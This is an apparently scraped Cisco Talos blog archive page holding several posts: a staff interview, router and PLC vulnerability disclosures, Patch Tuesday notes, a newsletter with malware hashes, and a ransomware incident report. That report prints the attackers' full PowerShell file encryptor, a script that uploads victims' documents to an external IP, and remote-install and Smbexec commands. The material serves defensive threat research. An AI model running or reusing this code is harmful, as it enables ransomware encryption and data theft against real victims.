Cisco Talos has uncovered a new attack linked to Famous Chollima, a threat group aligned with North Korea (DPRK).

BeaverTail and OtterCookie evolve with a new Javascript module

Laura opens up about her journey through various cybersecurity roles, her leap into incident response, and what it feels like to support customers during their toughest moments — including high-stakes situations impacting critical infrastructure.

Thursday, October 16, 2025 06:00

What does it take to lead through chaos and keep organizations safe in the digital age? This week, Amy sat down with Laura Faria, an incident commander at Cisco Talos Incident Response, to explore a career built on empathy, collaboration, and a passion for cybersecurity.

Laura opens up about her journey through various cybersecurity roles, her leap into incident response, and what it feels like to support customers during their toughest moments — including high-stakes situations impacting critical infrastructure.

**Amy Ciminnisi: Laura, it's great to have you on. You're an incident commander, like Alex from last episode. When did your time at Talos start, and what did your journey here look like?**

Laura Faria: My entire career, I've worked in many large cybersecurity vendors - endpoint vendors, firewall vendors, RAV vendors... So I've been in a lot of different roles, but they were mostly in sales. I was actually a Cisco employee prior to joining Talos IR. I've been at Cisco for a little over a year now, and Talos is one of the best places to work in Cisco, in my opinion. They have a really high reputation because everyone knows the quality of research that Talos provides our customers with.

I'd never been an incident commander before, so it was a really new position to me. But it was definitely something I was interested in, and the more I learned about what the role entailed, the more I was excited to pursue it.

**AC: This is a very high-pressure role, and I'm sure you have to deal with a lot of chaos, a lot of moving parts. How do you stay focused and motivated to keep going when you're tackling these really serious incidents for our clients?**

LF: A common phrase in Talos IR is "It's never a good day when an incident happens." During very serious episodes, being there to help the customer feels really good, especially if you're a people person, and especially if you're empathetic and a lot with people's emotions.

Recently, I had a very difficult incident where a large health care facility was seeing a lot of outages in different locations throughout the nation. Every time we saw a site outage, it was devastating because we knew what that meant. We actually had people's lives in our hands. Although it's a very difficult job, taking the time to look at the big picture and understand the importance of your job is really what keeps you going.

_Want to see more?_ _Watch the full interview__, and don’t forget to subscribe to our YouTube channel for future episodes of Humans of Talos!_

Laura Faria: Empathy on the front lines

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed one vulnerability in the OpenPLC logic controller and four vulnerabilities in the Planet WGR-500 router.  
For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability

Wednesday, October 15, 2025 13:39

Cisco Talos’ Vulnerability Discovery & Research team recently disclosed one vulnerability in the OpenPLC logic controller and four vulnerabilities in the Planet WGR-500 router.  

For Snort coverage that can detect the exploitation of these vulnerabilities, download the latest rule sets from Snort.org, and our latest Vulnerability Advisories are always posted on Talos Intelligence’s website.     

****OpenPLC denial-of-service vulnerability****

_Discovered by a member of Cisco Talos._   

OpenPLC is an open-source programmable logic controller intended to provide a low cost industrial solution for automation and research. 

Talos researchers found TALOS-2025-2223 (CVE-2025-53476), a denial-of-service vulnerability in the ModbusTCP server functionality of OpenPLC\_v3. A specially crafted series of network connections can prevent the server from processing subsequent Modbus requests. An attacker can open a series of TCP connections to trigger this vulnerability.

****Planet WGR-500 stack-based buffer overflow, OS command injection, format string vulnerabilities****

_Discovered by Francesco Benvenuto of Cisco Talos._   

The Planet Networking & Communication WGR-500 is an industrial router designed for Internet of Things (IoT) networks, particularly industrial networks such as transportation, government buildings, and other public areas. Talos found four vulnerabilities in the router software.

TALOS-2025-2226 (CVE-2025-54399-CVE-2025-54402) includes multiple stack-based buffer overflow vulnerabilities in the formPingCmd functionality. A specially crafted series of HTTP requests can lead to stack-based buffer overflow.

TALOS-2025-2227 (CVE-2025-54403-CVE-2025-54404) includes multiple OS command injection vulnerabilities in the swctrl functionality. A specially crafted network request can lead to arbitrary command execution.

TALOS-2025-2228 (CVE-2025-48826) is a format string vulnerability in the formPingCmd functionality of Planet WGR-500. A specially crafted series of HTTP requests can lead to memory corruption.

TALOS-2025-2229 (CVE-2025-54405-CVE-2025-54406) includes multiple OS command injection vulnerabilities in the formPingCmd functionality. A specially crafted series of HTTP requests can lead to arbitrary command execution.

Open PLC and Planet vulnerabilities

Microsoft has released its monthly security update for October 2025, addressing 175 Microsoft CVEs and 21 non-Microsoft CVEs. Among these, 17 vulnerabilities are considered critical and 11 are flagged as important and considered more likely to be exploited.

Tuesday, October 14, 2025 16:39

Microsoft has released its monthly security update for October 2025, addressing 175 Microsoft CVEs and 21 non-Microsoft CVEs. Among these, 17 vulnerabilities are considered critical and 11 are flagged as important and considered more likely to be exploited. Current intelligence shows that three of the important vulnerabilities have already been detected in the wild.

In the following notes we provide a concise overview of the most significant issues, focusing on the vulnerabilities that could impact the widest user base or carry the highest severity.

**Exploited in the Wild**

Three vulnerabilities were confirmed to have been exploited in the wild.

**CVE‑2025‑24990****: Windows Agere Modem Driver Elevation of Privilege Vulnerability**  
Microsoft identified a flaw in the third‑party Agere Modem driver that ships with supported Windows operating systems. The driver was permanently removed in the October cumulative update. Users who rely on fax modem hardware that depends on this driver should uninstall any remaining components, as the affected driver is no longer supported.

**CVE‑2025‑59230****: Windows Remote Access Connection Manager Elevation of Privilege Vulnerability**  
An improper access‑control check in Windows Remote Access Connection Manager allows an authorized attacker to gain elevated local privileges when accessing the service.

**CVE‑2025‑47827****: Secure Boot Bypass in IGEL OS before 11**  
This vulnerability permits a crafted root file-system to bypass Secure Boot on IGEL OS versions before 11 due to incorrect cryptographic signature verification performed by the igel-flash-driver module.

**Critical Vulnerabilities**

Microsoft marked 17 vulnerabilities as _critical_ in this release. While these have not been observed exploited in the wild, their severity warrants prompt remediation.

**CVE‑2025‑59287** **Windows Server Update Service (WSUS) Remote Code Execution Vulnerability** - Deserialization of untrusted data in WSUS allows an attacker to remotely execute code, potentially compromising the update service on vulnerable servers.

**CVE‑2025‑59246****,** **CVE‑2025‑59218**  **Azure Entra ID Elevation of Privilege Vulnerabilities** - An attacker could exploit Azure Entra ID to elevate privileges, affecting the identity platform’s access control.

**CVE‑2025‑0033** **RMP Corruption During SNP Initialization** - A race condition during Reverse Map Table initialization in AMD EPYC SEV‑SNP processors can allow a hypervisor with privileged control to modify RMP entries before they are locked. Azure Confidential Computing products contain multiple safeguards to prevent host compromise.

**CVE‑2025‑59234** **Microsoft Office Remote Code Execution Vulnerability** \- A use‑after‑free bug in Microsoft Office enables an attacker to execute code locally on an affected system, contingent on the presence of vulnerable content.

**CVE‑2025‑49708** **Microsoft Graphics Component Elevation of Privilege Vulnerability** - An unauthenticated network attacker can manipulate the Graphics component through use‑after‑free logic to elevate privileges on a target machine.

**CVE‑2025‑59291** **Confidential Azure Container Instances Elevation of Privilege Vulnerability** - External control of file names or paths in Confidential Azure Container Instances allows a privileged attacker to elevate privileges locally within the container environment.

**CVE‑2025‑59292** **Azure Compute Gallery Elevation of Privilege Vulnerability** - Misuse of file names or paths can enable a privileged attacker to gain elevated rights in an Azure Compute Gallery context.

**CVE‑2025‑59227** **Microsoft Office Remote Code Execution Vulnerability** - Exploitation of this vulnerability would allow remote execution on Office applications across multiple Windows versions.

**CVE‑2025‑59247** **Azure PlayFab Elevation of Privilege Vulnerability** - PlayFab services can be manipulated by an unauthorized actor to elevate privileges, impacting the underlying Azure infrastructure.

**CVE‑2025‑59252****,** **CVE‑2025‑59272****,** **CVE‑2025‑59286** **Copilot Spoofing Vulnerabilities** - Improper sanitization and encoding of user‑supplied data in Microsoft 365 Copilot leads to spoofing attacks.

**CVE‑2025‑59271** **Redis Enterprise Elevation of Privilege Vulnerability** - Redis Enterprise servers may allow privileged escalation through a configuration oversight, impacting managed Azure Redis services.

**CVE‑2025‑55321** **Azure Monitor Log Analytics Spoofing Vulnerability** - Cross‑site scripting (XSS) in Azure Monitor allows a network attacker to perform spoofing attacks within the Log Analytics portal.

**CVE‑2025‑59236** **Microsoft Excel Remote Code Execution Vulnerability** - An unauthorized attacker could trigger a use‑after‑free in Microsoft Excel, causing local code execution on the target system.

**CVE‑2016‑9535** **LibTIFF Heap Buffer Overflow** - The libtiff library contains a heap‑buffer‑overflow that can be triggered by malformed TIFF files, potentially allowing an attacker to execute arbitrary code under the user context.

Talos would also like to highlight 11 important vulnerabilities were considered more likely to be exploited: CVE‑2025‑48004, CVE‑2025‑24052, CVE‑2025‑55676, CVE‑2025‑55681, CVE‑2025‑58722, CVE‑2025‑59199, CVE‑2025‑55680, CVE‑2025‑55692, CVE‑2025‑55693, CVE‑2025‑55694 and CVE‑2025‑59194. They range from remote code execution to privilege escalation across both desktop and cloud environments.

Security teams are encouraged to examine the detailed advisory documents for each CVE to understand the exact scope and mitigations. A complete list of all the other vulnerabilities Microsoft disclosed this month is available on its update page. 

In response to these vulnerability disclosures, Talos is releasing a new Snort ruleset that detects attempts to exploit some of them. Please note that additional rules may be released at a future date, and current rules are subject to change pending additional information. Cisco Security Firewall customers should use the latest update to their ruleset by updating their SRU. Open-source Snort Subscriber Ruleset customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org.

Snort 2 rules included in this release that protect against the exploitation of many of these vulnerabilities are:  65391 - 65410, 64420 - 65422.

The following Snort 3 rules are also available: 301325 - 301334.

Microsoft Patch Tuesday for October 2025 — Snort rules and prominent vulnerabilities

Martin muses on why computers are less fun than campfires, why their dangers seem less real, and why he’s embarking on a lengthy research project to study this.

Thursday, October 9, 2025 14:00

Harnessing fire is one of mankind’s earliest technological advances. A controlled, tame fire offers us warmth, light and succulent cooked food. Yet, allow the controlled fire to burn too fiercely and it risks becoming an uncontained fire. The unexpected smell of smoke or the sight of tall flames provokes a deep fear within us and demands an instant response to contain and extinguish the fire, or to flee from its path.

We instinctively understand the benefits and dangers of fire. Through bitter experience we’ve learnt how to design and operate buildings to minimise the risks and maximise the survivability of fire. These lessons have become coded in rules and legislation which are often actively enforced and result in heavy sanctions for those who break them even before there is any evidence of a fire occurring.

In comparison, computer systems are a very recent technology. There are clear benefits to networked computer systems, we have come to rely on them to conduct many of the day-to-day tasks in our personal and professional lives. Yet, the dangers of computers are intangible. You can’t smell a software vulnerability or feel the burning heat of an active breach. Somehow their ethereal nature feels less pressing than the risk of fire and may to lead to complacency in addressing cyber threats.

The question of why we continue to experience cyber breaches despite having the technical know how to prevent them is one that fascinates me. I’m intrigued by the differences in decision making processes that leads to cyber risk either being prioritised or deprioritised within organisations. Indeed, so much so that this week I’m commencing a part-time doctorate to research this issue.

Frequently, cyber intelligence concentrates on the here and now, providing vital information to defend systems in the immediate term or near future. Threat intelligence must be timely. After all, it is better to have 80% of the intelligence in time than 100% too late. Yet, this rapid drum beat of needing to respond quickly can detract from the longer-term strategic intelligence issues of how the threat landscape is evolving and how we can improve our threat detection and response capabilities.

As a part-time student I have eight years to try and get a grip on how decisions in cyber security are made, and what makes a good decision. I’ll be certain to share my findings to help improve things, but don’t hold your breath, it will not be a fast process.

**The one big thing**

Cisco Talos has been closely monitoring the abuse of cascading style sheets (CSS) properties to include irrelevant content (or salt) in different parts of messages, a technique known as hidden text salting.

**Why do I care?**

There is widespread use of hidden text salting in malicious emails to bypass detection. Attackers embed hidden salt in the preheader, header, attachments and body — using characters, paragraphs and comments — by manipulating text, visibility and sizing properties. Talos has observed that hidden content is far more often found in spam and other email threats than in legitimate emails, posing a substantial challenge to both basic and advanced email defense solutions that leverage machine learning.

**So now what? **

As explained with multiple examples, CSS provides a wide range of properties that can be abused by attackers to evade spam filters and detection engines. Therefore, two possible countermeasures are: first, to detect the presence of hidden text (or salt) in emails, and more importantly, to filter out the added salt before passing the message to downstream detection engines.

**Top security headlines of the week**

**Physics Nobel Awarded to Three Scientists for Quantum Computing Breakthroughs**  
The 2025 Nobel Prize in Physics was awarded to three scientists for foundational work enabling quantum error correction — a cornerstone for stable, scalable quantum computers that could eventually undermine today’s encryption systems. (BBC)

**Microsoft Defender Bug Triggers Erroneous BIOS Update Alerts**  
A bug in Microsoft Defender for Endpoint caused false vulnerability alerts related to Dell BIOS updates, leading to confusion among enterprise security teams. Microsoft confirmed the issue stems from a logic flaw in its vulnerability-fetching process. (Bleeping Computer)

**Federal Government Acknowledges End of MS-ISAC Support**  
The U.S. federal government confirmed it will end funding for the Multi-State Information Sharing and Analysis Center (MS-ISAC), a program with a 20-year track record of helping state and local governments coordinate cybersecurity efforts. Advocates warn its loss will significantly weaken local cyber defense collaboration. (GovTech)

**Can’t get enough Talos?**

**Footholds in Infrastructure: Defending Service Providers**  
Service providers sit at the heart of global connectivity... and the center of the threat landscape. In this short documentary, Cisco Talos explores the unique cybersecurity challenges faced by service providers.

**Velociraptor leveraged in ransomware attacks**  
Cisco Talos has confirmed that ransomware operators are leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool that had not previously been definitively tied to ransomware incidents.

**What to do when you click on a suspicious link**  
As the go-to cybersecurity expert for your friends and family, you’ll want to be ready for those “I clicked a suspicious link — now what?” messages. Share this quick guide to help them know exactly what to do next.

**Talos Takes: You can’t patch burnout**   
October is Cybersecurity Awareness Month, but what happens when the defenders themselves are overwhelmed? In this powerful episode, Hazel and Joe Marshall get real about why protecting your well-being is just as vital as any technical defense.

**Upcoming events where you can find Talos **

*   Wild West Hackin' Fest (Oct. 8 – 10) Deadwood, SD 
*   DEEP Conference (Oct. 22 – 23) Petrčane, Croatia 

**Most prevalent malware files from Talos telemetry over the past week **

**SHA256: d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a**  
MD5: 1f7e01a3355b52cbc92c908a61abf643  
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=d933ec4aaf7cfe2f459d64ea4af346e69177e150df1cd23aad1904f5fd41f44a  
Example Filename: cleanup.bat  
Detection Name: W32.D933EC4AAF-90.SBX.TG

**SHA256: 9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507**  
MD5: 2915b3f8b703eb744fc54c81f4a9c67f  
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=9f1f11a708d393e0a4109ae189bc64f1f3e312653dcf317a2bd406f18ffcc507  
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe\_1\_Exe.exe  
Detection Name: Win.Worm.Coinminer::1201

**SHA256: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974**  
MD5: aac3165ece2959f39ff98334618d10d9  
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974  
Example Filename: 96fa6a7714670823c83099ea01d24d6d3ae8fef027f01a4ddac14f123b1c9974.exe  
Detection Name: W32.Injector:Gen.21ie.1201

**SHA256: c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe**  
MD5: bf9672ec85283fdf002d83662f0b08b7  
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=c0ad494457dcd9e964378760fb6aca86a23622045bca851d8f3ab49ec33978fe  
Example Filename: f\_00db3a.html  
Detection Name: W32.C0AD494457-95.SBX.TG

**SHA256: a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91**  
MD5: 7bdbd180c081fa63ca94f9c22c457376  
Talos Rep: https://talosintelligence.com/talos\_file\_reputation?s=a31f222fc283227f5e7988d1ad9c0aecd66d58bb7b4d8518ae23e110308dbf91  
Example Filename: e74d9994a37b2b4c693a76a580c3e8fe\_3\_Exe.exe  
Detection Name: Win.Dropper.Miner::95.sbx.tg

Why don’t we sit around this computer console and have a sing-along?

Cisco Talos has confirmed that ransomware operators are leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool that had not previously been definitively tied to ransomware incidents.  
We assess with moderate confidence that this activity can be attributed to threat actor Storm-2603, based on overlapping tools

Thursday, October 9, 2025 06:00

*   Cisco Talos has confirmed that ransomware operators are leveraging Velociraptor, an open-source digital forensics and incident response (DFIR) tool that had not previously been definitively tied to ransomware incidents.  
*   We assess with moderate confidence that this activity can be attributed to threat actor Storm-2603, based on overlapping tools and tactics, techniques, and procedures (TTPs)  
*   Talos also observed evidence of Babuk ransomware files on the victim’s network, which has not been previously deployed by Storm-2603. 

In August 2025, Talos responded to a ransomware attack by actors who appeared to be affiliated with Warlock ransomware, based on their ransom note and use of Warlock’s data leak site (DLS). They deployed Warlock, LockBit, and Babuk ransomware to encrypt VMware ESXi virtual machines (VMs) and Windows servers. This severely impacted the customer’s IT environment. 

 Figure 1. Ransomware note. 

**Velociraptor **

Velociraptor is designed for security teams to use for endpoint monitoring by deploying client agents across Windows, Linux and Mac systems to continuously collect data and respond to security events. 

Velociraptor played a significant role in this campaign, ensuring the actors maintained stealthy persistent access while deploying LockBit and Babuk ransomware. After gaining initial access the actors installed an outdated version of Velociraptor (version 0.73.4.0) that was exposed to a privilege escalation vulnerability (CVE-2025-6264) that could lead to arbitrary command execution and endpoint takeover. 

Threat actors have also reportedly leveraged Velociraptor to download and execute Visual Studio Code with the likely intention of creating a tunnel to an attacker-controlled command-and-control (C2) server.  

The addition of this tool in the ransomware playbook is in line with findings from Talos’ 2024 Year in Review, which highlights that threat actors are utilizing an increasing variety of commercial and open-source products. 

Talos assesses with moderate confidence that this activity can be attributed to the group Storm-2603, based on overlapping tools and TTPs. Storm-2603 is a suspected China-based threat actor first identified in July 2025, when they began exploiting the on-premises SharePoint vulnerabilities known as ToolShell. 

Similar to the activity Talos observed in this engagement, Storm-2603 is known for deploying Warlock ransomware and Lockbit ransomware in the same engagement. While LockBit is widely deployed by a variety ransomware actors, Warlock was first advertised in June 2025 and has since been heavily used by Storm-2603. Additionally, it is highly unusual for actors to use two different ransomware variants in the same attack, increasing our confidence that this activity could be related to Storm-2603. 

The threat actor in this engagement also mirrored several Storm-2603 TTPs, based on reporting by Microsoft: 

*   Use of cmd.exe and batch scripts 
*   Disabling Microsoft Defender protections 
*   Creating scheduled tasks 
*   Manipulating Internet Information Services (IIS) components to load suspicious .NET assemblies 
*   Modifying Group Policy Objects (GPOs) 

While Talos was unable to observe how the actor obtained initial access due to limited access to the victim organization’s data, both their exposure to the ToolShell vulnerabilities and our attribution to Storm-2603 increase the likelihood that initial access was gained through ToolShell exploitation.  

**Campaign overview **

The first high-confidence indications of suspicious activity associated with this campaign occurred in mid-August 2025, with attempts to escalate privileges and move laterally within the compromised environment. We observed the threat actor creating admin accounts that synced to Entra ID (formerly Azure Active Directory) via the domain controller. The same actor-controlled admin account also accessed the VMware vSphere console, an interface used to manage and interact with virtual machines (VMs), which could allow for persistent access to the virtual environment. 

Notably, the threat actor installed an older version of Velociraptor on multiple servers to maintain persistence using the following command. We observed Velociraptor launching several times even after the host was isolated. 

    msiexec  /q /i hxxps[:]//stoaccinfoniqaveeambkp.blob.core.windows[.]net/veeam/v2.msi 

The actors also executed the following command to run Smbexec, a Python script that comes with Impacket and allows an attacker to launch programs remotely using the SMB protocol: 

    %COMSPEC% /Q /c echo cd ^> \\%COMPUTERNAME%\C$\__output 2^>^&1 > %SYSTEMROOT%\TkTvjYUp.bat & %COMSPEC% /Q /c %SYSTEMROOT%\TkTvjYUp.bat & del %SYSTEMROOT%\TkTvjYUp.bat  
    C:\Windows\System32\cmd.exe cmd.exe /Q /c cmd /c c:\windows\temp\1.bat /y 1> \Windows\Temp\suLGnR 2>&1 

To impair defenses and evade detection, the actors modified Active Directory (AD) GPOs and: 

*   Enabled “turn off real-time protection,” which continuously monitors for potential threats such as viruses, malware and spyware 
*   Disabled “behavior monitoring,” which blocks suspicious activities by observing deviations from established patterns of normal behavior 
*   Disabled “monitor file and program activity on your computer,” which observes how software behaves to identify patterns associated with malicious activity 

The actors deployed a fileless Powershell script that had an encryption functionality, which we believe was the primary encryptor that deployed mass encryption on the Windows machines:  

    function GER($n) {-join (1..$n|%{"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()-=+[]{}|;:',.<>?`~"[(Get-Random -Maximum 74)]})}function err($pl,$sf){$rsa=New-Object System.Security.Cryptography.RSACryptoServiceProvider;$rsa.FromXmlString($sf);$PB=[Text.Encoding]::UTF8.GetBytes($pl);$rsa.Encrypt($PB,$false)} function gg($path) {$ke = GER(32);$ig =GER(16);$sf = 'tdIXltqjmTpXRB43p+k6X9+JqBZvsD7+X4GsM0AVh0QS6Oev5RVAaQqc6m2pEKN7AYARcpz9iNy5JOB/T+OtWmqxd42bLH+iAUjc1kc1qk1Cg38t7obrGja8L7UMoJkb97ry0ngak9BlqaS7P+wzApOLVJoBNxaJ2rCoj7+Crh3p3Vm2/7/o4pMjgg4S838jw6aiRbag/v4SR86oupqjBvKxsAcZo5A4NDFoZ29j/IMa6GNpMkVjsNPjvB/GIqGcbTqJkb8HGSXw3KvHqwqfsB+01VTsbO7B8kIkOr4jB/M+bHFwgYkUG4rS2s/yJcOOkzH0tJwEj11tLv2bHSzoQQ==AQAB'; $eec=err -pl $ke+$ig -sf $sf;$eee=[System.Convert]::ToBase64String($eec);$key=[System.Text.Encoding]::UTF8.GetBytes($ke);$iv=[System.Text.Encoding]::UTF8.GetBytes($ig);try{$files=gci $path -Recurse -Include .pdf,.txt, *.doc, *.docx, *.odt, *.rtf, *.md, *.csv, *.tsv, *.jpg, *.jpeg, *.tiff, *.mp3, *.xls, *.xlsx, *.ods, *.ppt, *.pptx, *.odp, *.py, *.java, *.cpp, *.c, *.html, *.css, *.js, *.php, *.swift, *.kotlin, *.go, *.rb, *.sh, *.sql, *.db, *.sqlite, *.sqlite3, *.mdb, *.sql, *.zip, *.rar, *.7z, *.tar, *.gz, *.bz2, *.iso, *.torrent, *.ini, *.json, *.xml, *.log, *.bak, *.cfg, *.psd, *.vmdk | select -Expand FullName; foreach ($file in $files) { try {EFI $file $key $iv $eee} catch{}}} catch {Write-Host $ }} function EFI($ifi,$key,$iv,$aT) {if($ifi.EndsWith(".xlockxlock", [System.StringComparison]::OrdinalIgnoreCase)) {return};$aes = [System.Security.Cryptography.Aes]::Create();$aes.KeySize = 256;$aes.Key=$key;$aes.IV=$iv;try{$yy=New-Object System.IO.FileStream($ifi, [System.IO.FileMode]::Open,[System.IO.FileAccess]::ReadWrite, [System.IO.FileShare]::None); $xx=$aes.CreateEncryptor($aes.Key, $aes.IV); $mm = New-Object System.Security.Cryptography.CryptoStream($yy, $xx, [System.Security.Cryptography.CryptoStreamMode]::Write); $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $jj = New-Object byte[] ($yy.Length); $yy.Read($jj, 0, $jj.Length) | Out-Null; $yy.Seek(0, [System.IO.SeekOrigin]::Begin) | Out-Null; $mm.Write($jj, 0, $jj.Length); $mm.FlushFinalBlock(); $se = 1 } catch { Write-Error $_ } finally {if ($mm) { $mm.Dispose() } if ($yy) { $yy.Dispose() } }try {$kk = [System.Text.Encoding]::UTF8.GetBytes($aT);$bb = New-Object System.IO.FileStream($ifi,[System.IO.FileMode]::Append,[System.IO.FileAccess]::Write,[System.IO.FileShare]::None);if ($se){$bb.Write($kk, 0, $kk.Length)}} catch {Write-Error $_} finally {if ($bb) { $bb.Dispose();if ($se){ren $ifi -NewName $ifi".xlockxlock";}}}};$vg =gdr -PS FileSystem | select -Expand Root;foreach ($II in $vg) {gg -path "$II"} 

After the script was deployed, Talos observed ransomware executables on Windows machines that were identified by EDR solutions as LockBit, and encrypted files with the Warlock extension “xlockxlock”. There was also a Linux binary on ESXi servers flagged as the Babuk encryptor, which achieved only partial encryption and appended files with “.babyk”. Storm-2603 has not previously leveraged Babuk ransomware, based on public reporting. 

The actors also conducted double extortion, exfiltrating data using the below PowerShell script. To evade detection, the exfiltration script shows that “$ProgressPreference” is set to “SilentlyContinue”, which suppresses any visual indication of the command’s progress. It also includes the “start-sleep” cmdlet, which suspends the script for a specified period of time. This cmdlet can be used to inhibit analysis, as many malware analysis tools, such as sandboxes, have a limited time window, and used to avoid triggering security alerts that might identify rapid, continuous script activity. 

    function GR {$numbers = 1..20;$numbers | Get-Random }  
    function Upfile { 
        param ( 
            [string]$path = "C:\Users\", 
            [int]$maxConcurrentJobs = 40  # 
        ) 
        Add-Type -AssemblyName System.Web 
        try { 
            $files = Get-ChildItem -Path $path -Recurse -Include *.doc,*.docx,*.xlsx,*.ppt,*.pptx,*.xls -ErrorAction SilentlyContinue |  
                    Where-Object { $_.Length -lt 50MB } |  
                    Select-Object -ExpandProperty FullName 
            $uploadScriptBlock = { 
                param ($file, $grValue) 
                try { 
                    Add-Type -AssemblyName System.Web 
                    $fileName = Split-Path -Path $file -Leaf 
                    $encodedFileName = [System.Web.HttpUtility]::UrlEncode($fileName) 
                    $uploadUrl = "http[:]//65.38.121[.]226/test/$encodedFileName" 
                    Write-Host "upload $file to $uploadUrl" 
                    $ProgressPreference = 'SilentlyContinue' 
                    $maxRetries = 3;$retryCount = 0 
    while ($retryCount -lt $maxRetries) { 
                try { 
    $wc = New-Object System.Net.WebClient;$wc.UploadFile($uploadUrl, "PUT", $file) | Out-Null 
                    Write-Host "upload Sucess $fileName" 
                    break 
    }  
    catch { 
                    $retryCount++ 
                    Write-Host "upload $fileName retry $retryCount error: $_" 
                    Start-Sleep -Seconds 2 
                    }  
                    finally {$wc.Dispose()}}}  
           catch  
                { 
                    Write-Host "upload $fileName error: $_" 
                } 
                finally {$wc.Dispose()} 
            
            } 
            $grValue = GR 
            $jobs = @() 
            foreach ($file in $files) { 
                while ((Get-Job -State Running).Count -ge $maxConcurrentJobs) {Start-Sleep -Milliseconds 100} 
                $jobs += Start-Job -ScriptBlock $uploadScriptBlock -ArgumentList $file, $grValue 
            } 
            $jobs | Wait-Job | ForEach-Object { 
                Receive-Job -Job $_ -Keep 
                Remove-Job -Job $_ 
            } 
        } catch { 
            Write-Host "getfile error: $_" 
        } 
    } 
    $drives = @("C:\Users\", "D:\", "E:\", "F:\", "K:\") 
    foreach ($drive in $drives) { 
        if (Test-Path $drive) {Upfile -Path $drive   } 
        else {Write-Host "Drive $drive is not accessible." -ForegroundColor Yellow} 
    } 

**Mitigation recommendations **

Please see Talos’ Ransomware Primer for detailed recommendations on how to safeguard against ransomware threats. We also recommend referring to Talos’ blog on ToolShell for information on these vulnerabilities and how to patch them. Additionally, Rapid7 has published some recommendations on detecting velociraptor misuse.

**MITRE ATT&CK techniques **

Resource Development  

*   T1584.003 Compromise Infrastructure: Virtual Private Server 

Execution 

*   T1059.001 PowerShell 

Persistence  

*   T1136 Create Account 
*   T1505.006 Server Software Component: vSphere Installation Bundles 

Privilege Escalation  

*   T1098.007 Account Manipulation: Additional Local or Domain Groups 
*   T1098 Account Manipulation 

Defense Evasion  

*   T1556 Modify Authentication Process 
*   T1484.001 Domain or Tenant Policy Modification: Group Policy Modification 

Lateral Movement  

*   T1021.001 Remote Services: Remote Desktop Protocol 

Collection  

*   T1213 Data from Information Repositories 

Exfiltration 

*   T1041 Exfiltration Over C2 Channel 

Impact 

*   T1486 Data Encrypted for Impact 
*   T1657 Financial Theft 

**Coverage**

Cisco Secure Endpoint (formerly AMP for Endpoints) is ideally suited to prevent the execution of the malware detailed in this post. Try Secure Endpoint for free here.

Cisco Secure Email (formerly Cisco Email Security) can block malicious emails sent by threat actors as part of their campaign. You can try Secure Email for free here.

Cisco Secure Firewall (formerly Next-Generation Firewall and Firepower NGFW) appliances such as Threat Defense Virtual, Adaptive Security Appliance and Meraki MX can detect malicious activity associated with this threat.

Cisco Secure Network/Cloud Analytics (Stealthwatch/Stealthwatch Cloud) analyzes network traffic automatically and alerts users of potentially unwanted activity on every connected device.

Cisco Secure Malware Analytics (Threat Grid) identifies malicious binaries and builds protection into all Cisco Secure products.

Cisco Secure Access is a modern cloud-delivered Security Service Edge (SSE) built on Zero Trust principles. Secure Access provides seamless transparent and secure access to the internet, cloud services or private application no matter where your users work. Please contact your Cisco account representative or authorized partner if you are interested in a free trial of Cisco Secure Access.

Umbrella, Cisco’s secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs and URLs, whether users are on or off the corporate network.

Cisco Secure Web Appliance (formerly Web Security Appliance) automatically blocks potentially dangerous sites and tests suspicious sites before users access them.

Additional protections with context to your specific environment and threat data are available from the Firewall Management Center.

Cisco Duo provides multi-factor authentication for users to ensure only those authorized are accessing your network.

Open-source Snort Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on Snort.org. 

The following ClamAV cover this threat_:_    
Win.Ransomware.Warlock-10057029-0  

**IOCs **

IOCs for this research can also be found at our GitHub repository here.

_C2/exfiltration IP address:_   
65.38.\[121\]\[.\]226 

_Domain hosting malicious MSI:_   
stoaccinfoniqaveeambkp.blob.core.windows\[.\]net 

_Velociraptor C2 server_:   
velo.qaubctgg.workers\[.\]dev 

_Velociraptor:Legitimate tool used by the adversary for persistence_   
Velociraptor installer – 649BDAA38E60EDE6D140BD54CA5412F1091186A803D3905465219053393F6421   
Velociraptor.exe - 12F177290A299BAE8A363F47775FB99F305BBDD56BBDFDDB39595B43112F9FB7   
Malicious Velociraptor config.yaml - A29125333AD72138D299CC9EF09718DDB417C3485F6B8FE05BA88A08BB0E5023  

_Internal Monologue NTLM downgrade malware:_   
In.exe- C74897B1E986E2876873ABB3B5069BF1B103667F7F0E6B4581FBDA3FD647A74A

Velociraptor leveraged in ransomware attacks

As the go-to cybersecurity expert for your friends and family, you’ll want to be ready for those “I clicked a suspicious link — now what?” messages. Share this quick guide to help them know exactly what to do next.

Wednesday, October 8, 2025 06:00

October is Cybersecurity Awareness Month, and as the tech-savvy friend or family member, people probably come to you for advice. One of the most common questions is: “I clicked a suspicious link. What do I do now?” 

Don’t worry — panic won’t help, but a calm, step-by-step response will. Share this guide with your loved ones so everyone knows exactly how to respond and stay safe. 

If you clicked the link on a work device, immediately contact IT support and follow their instructions. Companies often have specific policies and tools to investigate and remediate security incidents. Quick reporting helps protect both you and your organization. 

If it’s a personal device, **here’s what to do next.**

**Scenario 1: You only clicked the link, and did not enter any information **

Clicking a malicious link can trigger automatic downloads, attempt to exploit browser vulnerabilities, or install malware without your knowledge. 

*   Exit the browser immediately. 
